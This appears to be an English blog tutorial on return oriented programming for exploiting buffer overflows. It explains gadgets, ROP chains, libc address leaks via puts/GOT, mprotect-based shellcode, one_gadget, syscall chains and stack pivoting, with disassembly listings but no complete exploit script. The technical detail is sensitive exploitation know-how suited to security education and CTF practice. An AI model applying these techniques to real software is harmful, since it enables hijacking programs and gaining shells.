[Binary Exploitation] Return Oriented Programming

Untuk bahasa Indonesia, silakan klik link ini

English

Probably the most famous CWE in the world, buffer overflows can be exploited in numerous ways, one of those being return oriented programming. In this post, I will be explaining the different ways to exploit a buffer overflow with return oriented programming.

1. Prerequisites

Like many other binary exploitation techniques, knowledge on how assembly works is very useful. In order to understand what I will be explaining in this post, it is recommended to know:

Buffer overflows
Registers, especially the stack pointer
Function calls in assembly
Pointers

2. Return oriented programming in a nutshell

Return oriented programming (ROP) is exactly what it’s name implies, programming by returning. Every call instruction in assembly does two things, it pushes the next instruction’s address to the stack, and modifies the value of the instruction pointer to what is determined. Almost every call instruction is paired with an upcoming ret instruction. This instruction pops whatever value is in the stack and places it’s into the instruction pointer.

This is the main goal of return oriented programming. If the attacker can change the value that was previously placed into the stack, say with a buffer overflow, they can gain access to change the value of the instruction pointer to whatever they want.

3. Gadgets

Common terminology used in exploiting return oriented programming is gadgets. Gadgets are small pieces of code that end in a ret instruction. Here is a few examples, you can find these in any old elf binary.

Error

Gadgets are used to create what is called a ROP chain.

3.1. Finding gadgets

In the above example, a tool was used to find the gadgets. Examples of tools that can be used are ropper and ROPgadget

4. ROP chains

A ROP chain is a series of gadgets used by the attacker in order to run pieces of code consecutively, in order to modify registers or data in the stack, heap, or bss. ROP chains can be accomplished because most gadgets end in the ret instruction. Because of this, by placing two or more gadget addresses in the stack, after the first gadget is done executing, execution will continue to the next gadget address located in the stack. Here’s an illustration of a ROP chain (source):

Error

If you are still confused, go ahead and watch this video from LiveOverflow. I hope it helps.

5. Techniques to exploit ROP

By now you probably understand how ROP works, and what ROP chaining is. That itself isn’t enough to RCE though, so I will show you the techniques I know to exploit ROP

1. Jumping to a function
Sometimes, instead of jumping to small pieces of code, jumping to an entire function can be useful. Since (almost) all functions end with a ret instruction, creating ROP chains is still possible

2. Set the functions parameters
Most functions require parameters in order to function properly. However, for 32-bit and 64-bit architectures, the location in which the parameters are stored is different

For 32-bit, the function parameters are stored in the stack, directly after the return address
For 64-bit, the function parameters are stored in 6 registers, which are rdi, rsi, rdx, rcx, r8, and r9. If the function requires more than 6 parameters, the remaining parameters will be stored in the stack

3. The problem with 32-bit
When jumping to a function in a 32-bit binary, the parameters are stored in the stack. This can interfere with our ropchain because function parameters most likely are not valid addresses to executable area. However, there is a solution to this problem, which is creating a payload as such:

(function to return to) + (address where buffer overflow is located) + (function parameters)

With a payload like this, after the function is done executing, execution will return to the function where the buffer overflow is located. Then, we can exploit the buffer overflow again, and create a brand new ROP chain.

4. The problem with 64-bit
When jumping to a function in a 64-bit binary, the first 6 parameters are located in registers. Registers are not stored in the stack, but they are stored in a seperate location in your machine. Because of this, we can’t use the buffer overflow directly to change the register values. However, like in 32-bit, there is a solution.

In every binary compiled with gcc, there is a certain function called __libc_csu_init. This function is sort of like a constructor for your entire program. You can learn more about it here. Let’s see if we can find a useful gadgets in this function.

0x0000000000400710 <+0>:	push   r15
0x0000000000400712 <+2>:	push   r14
0x0000000000400714 <+4>:	mov    r15,rdx
0x0000000000400717 <+7>:	push   r13
0x0000000000400719 <+9>:	push   r12
0x000000000040071b <+11>:	lea    r12,[rip+0x2006ee]        # 0x600e10
0x0000000000400722 <+18>:	push   rbp
0x0000000000400723 <+19>:	lea    rbp,[rip+0x2006ee]        # 0x600e18
0x000000000040072a <+26>:	push   rbx
0x000000000040072b <+27>:	mov    r13d,edi
0x000000000040072e <+30>:	mov    r14,rsi
0x0000000000400731 <+33>:	sub    rbp,r12
0x0000000000400734 <+36>:	sub    rsp,0x8
0x0000000000400738 <+40>:	sar    rbp,0x3
0x000000000040073c <+44>:	call   0x400498 <_init>
0x0000000000400741 <+49>:	test   rbp,rbp
0x0000000000400744 <+52>:	je     0x400766 <__libc_csu_init+86>
0x0000000000400746 <+54>:	xor    ebx,ebx
0x0000000000400748 <+56>:	nop    DWORD PTR [rax+rax*1+0x0]
0x0000000000400750 <+64>:	mov    rdx,r15
0x0000000000400753 <+67>:	mov    rsi,r14
0x0000000000400756 <+70>:	mov    edi,r13d
0x0000000000400759 <+73>:	call   QWORD PTR [r12+rbx*8]
0x000000000040075d <+77>:	add    rbx,0x1
0x0000000000400761 <+81>:	cmp    rbp,rbx
0x0000000000400764 <+84>:	jne    0x400750 <__libc_csu_init+64>
0x0000000000400766 <+86>:	add    rsp,0x8
0x000000000040076a <+90>:	pop    rbx
0x000000000040076b <+91>:	pop    rbp
0x000000000040076c <+92>:	pop    r12
0x000000000040076e <+94>:	pop    r13
0x0000000000400770 <+96>:	pop    r14
0x0000000000400772 <+98>:	pop    r15
0x0000000000400774 <+100>:	ret

It might seem like there isn’t much, but this function has a very important gadget. The pop r15 and pop r14 instructions both consist of two bytes. Let’s see what they are.

0x400770 <__libc_csu_init+96>:	0x41	0x5e

0x400772 <__libc_csu_init+98>:	0x41	0x5f

They both contain 0x41, but the latter is what is really interesting. Let’s assemble them.

0x400771 <__libc_csu_init+97>:	pop    rsi

0x400773 <__libc_csu_init+99>:	pop    rdi

Well that’s interesting. Now we have two gadgets, both in a function that is almost always present, which allows use to control the first two parameters of a function. For the other 4 gadgets, gadgets such as these ones are quite rare, but functions that need 6 parameters is also not very common.

5.1. The problem with 64-bit, part 2
Later in this post, I will talk about calling mprotect. But before that, it is required to know that mprotect needs 3 parameters, which are address, length, and prot. Just before we learnt an easy way to control the first two parameters of a function, using __libc_csu_init, but we haven’t controlled the third function parameter, which is stored in the rdx register. There is actually a gadget we can use, found in __libc_csu_init:

0x0000000000400750 <+64>:	mov    rdx,r15
0x0000000000400753 <+67>:	mov    rsi,r14
0x0000000000400756 <+70>:	mov    edi,r13d
0x0000000000400759 <+73>:	call   QWORD PTR [r12+rbx*8]
0x000000000040075d <+77>:	add    rbx,0x1
0x0000000000400761 <+81>:	cmp    rbp,rbx
0x0000000000400764 <+84>:	jne    0x400750 <__libc_csu_init+64>
0x0000000000400766 <+86>:	add    rsp,0x8
0x000000000040076a <+90>:	pop    rbx
0x000000000040076b <+91>:	pop    rbp
0x000000000040076c <+92>:	pop    r12
0x000000000040076e <+94>:	pop    r13
0x0000000000400770 <+96>:	pop    r14
0x0000000000400772 <+98>:	pop    r15
0x0000000000400774 <+100>:	ret

Unlike other gadgets, this gadget is far from a ret instruction. Also, there are other things to be weary about like the call instruction and the jne instruction. To pass them, you can set r12 + rbx*8 to an address that is only the ret instruction, and set rbp to the according rbx+1. Also the add rsp, 0x8 can sometimes be problematic.

Now that you can control the first three parameters of a function, you can call functions like mprotect, execve, fgets and more. But ofcourse calling those functions require knowing their respective addresses.

6. Leaking addresses
Now that we know the basics, let’s get started to try and create an arbitrary read.

I expect you as the reader already know about ASLR, if you dont go and have a read. ASLR by default is active on most machines, and by default it randomizes stack, heap, and libc addresses. However, the addresses of executable code and bss is only randomized if the protection PIE is enabled. For some binaries, this protection is disabled, this grants us access to ROP gadgets, Global Offset Table (GOT) and Procedure Linkage Table (PLT). If you don’t know about GOT and PLT, here is a video from LiveOverflow that you can watch.

For most binaries, they will have a way to print text onto the screen. This can be done with the function puts, printf, or even write. In any case, these functions can be used to print data from (almost) any address in the binary. Using a ROP chain, we can abuse this in order to get libc and/or stack addresses.

Here’s an example, in this binary we have a buffer overflow and we can change the return address. I’ll set the return address to the the address of the puts PLT, and I’ll set the first parameter to be the address of puts GOT.

Error

Boom we got a libc address, more specifically the address of puts. Now we can do a calculation to get the value of the system, and eventually get a shell.

7. Shellcoding
Almost always, every binary has the W^X protection. This prevents writing new executable code during runtime, since bad things could happen ofcourse. However, certain functions in libc can change the permissions of any block of memory, one of these functions being mprotect. Mprotect takes three parameters, which are address, length, and prot. Since we can effectively control the first three function parameters, we can call this function and change the permissions of certain blocks of memory.

Here’s an example, in this binary I’ll change the bss area from rw- to rwx. By using functions like fgets, we can write shellcode to that area and then jump to it.

Error

8. One gadget RCE
The tricks before both required the attacker to setup function parameters before calling the functions. But as it turns out, there are certain pieces of code located in libc that can be used to invoke a shell without having to set any function parameters. However, there are certain constraints that must be satisfied before being able to use them. The contraints usually consists of setting up registers and memory locations in a certain way.

To find these gadgets, a tool called one_gadget can be used. Here’s an example of me using one_gadget:

Error

9. Static binaries
In some cases, binaries will be compiled statically instead of dynamically. As a result of this, PIE protection will never be enabled (at least for nasm), however certain libc functions such as system won’t be available for use.

In this case, there are two things I like to do, which is call the function _dl_make_stack_executable, or invoke a syscall by only using gadgets.

9.1. _dl_make_stack_executable
In statically linked binaries, there is a certain function called _dl_make_stack_executable. This function can invoke a syscall to make the permissions of the stack become rwx, but it requires two conditions to be satisfied. Let’s look in the disassembly:

0x00000000004717e0 <+0>:	mov    rsi,QWORD PTR [rip+0x250a49]        # 0x6c2230 <_dl_pagesize>
0x00000000004717e7 <+7>:	push   rbx
0x00000000004717e8 <+8>:	mov    rbx,rdi
0x00000000004717eb <+11>:	mov    rax,QWORD PTR [rdi]
0x00000000004717ee <+14>:	mov    rdi,rsi
0x00000000004717f1 <+17>:	neg    rdi
0x00000000004717f4 <+20>:	and    rdi,rax
0x00000000004717f7 <+23>:	cmp    rax,QWORD PTR [rip+0x24f78a]        # 0x6c0f88 <__libc_stack_end>
0x00000000004717fe <+30>:	jne    0x47181f <_dl_make_stack_executable+63>
0x0000000000471800 <+32>:	mov    edx,DWORD PTR [rip+0x24f7da]        # 0x6c0fe0 <__stack_prot>
0x0000000000471806 <+38>:	call   0x435690 <mprotect>
0x000000000047180b <+43>:	test   eax,eax
0x000000000047180d <+45>:	jne    0x471826 <_dl_make_stack_executable+70>
0x000000000047180f <+47>:	mov    QWORD PTR [rbx],0x0
0x0000000000471816 <+54>:	or     DWORD PTR [rip+0x2509f3],0x1        # 0x6c2210 <_dl_stack_flags>
0x000000000047181d <+61>:	pop    rbx
0x000000000047181e <+62>:	ret    
0x000000000047181f <+63>:	mov    eax,0x1
0x0000000000471824 <+68>:	pop    rbx
0x0000000000471825 <+69>:	ret    
0x0000000000471826 <+70>:	mov    rax,0xffffffffffffffc0
0x000000000047182d <+77>:	pop    rbx
0x000000000047182e <+78>:	mov    eax,DWORD PTR fs:[rax]

This is a 64-bit executable, so the function parameters are stored in registers. Looking carefully, It seems that if rdi is set to the address of __libc_stack_end and if __stack_prot is set to 7, we can get a call to mprotect.

9.2. Syscall gadgets
The other trick I like to do is to create a ropchain in such a way that we can invoke a syscall. This means in 64-bit, I have to set rax, rdi, and rsi and also jump to a syscall instruction. In 32-bit, I have to set eax, ebx, and ecx and also jump to a int 0x80 instruction. This may seem hard, but it’s actually easier than calling _dl_make_stack_executable.

10. Stack pivoting
The last trick I will be explaining is stack pivoting. Basically, what we percieve as the “stack” is actually just an abstract concept. The stack is basically the area of memory in which the stack pointer is pointed to. If we can change the value of the stack pointer to point to a different location in memory, then we can say that new location is the “stack”.

What good does this do for us? Well in some binaries the ropchain we can make can be limited, say 2-3 chains at a time. In this case, for 64-bit binaries changing rdi and jumping to puts and back to main won’t be possible.

But what if in a different location we could write a long chain. Say, bss? Or maybe even the heap? But to be able to use this location as a rop chain, we need to set the stack register’s value to point to it. In this case, we could try and find an instruction like mov rsp, rax, but it’s almost never present is dynamically linked binaries.

Instead of generic instructions like that, we can use an unexpected one, leave. According to the Nasm docs, leave does two things, mov esp, ebp and then pop ebp.

As you know, the base pointer is located right before the return address, so we can corrupt it everytime we want to corrupt the return address. But instead of jumping to functions, by jumping to another leave; ret gadget, we can pivot the stack to another location in memory.

Let’s look at an example, in this binary, I’ve created a ropchain in the heap, and have also gotten a heap leak. I’m going to pivot the stack on to the heap and get a longer ropchain.

Error

6. Final words

In conclusion, ROP is a very exploitable vulnerability. This isn’t the end for ROP, as there are still techniques such as ret2dl_resolve, SROP, and more.